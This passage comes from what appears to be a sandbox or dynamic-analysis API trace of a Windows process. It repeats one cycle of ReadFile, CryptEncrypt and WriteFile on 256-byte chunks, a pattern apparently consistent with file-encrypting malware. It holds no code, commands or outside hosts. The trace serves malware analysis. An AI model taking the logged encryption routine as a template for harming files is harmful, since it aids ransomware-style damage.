pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.021] GetLastError () returned 0x0 [0173.021] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.021] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.021] GetLastError () returned 0x0 [0173.021] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.021] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.021] GetLastError () returned 0x0 [0173.021] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.021] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.021] GetLastError () returned 0x0 [0173.021] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.021] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.021] GetLastError () returned 0x0 [0173.021] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.022] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.022] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.022] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.023] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.023] GetLastError () returned 0x0 [0173.023] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.024] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.024] GetLastError () returned 0x0 [0173.024] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.024] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.025] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.025] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.025] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.025] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.026] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.026] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.026] GetLastError () returned 0x0 [0173.026] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 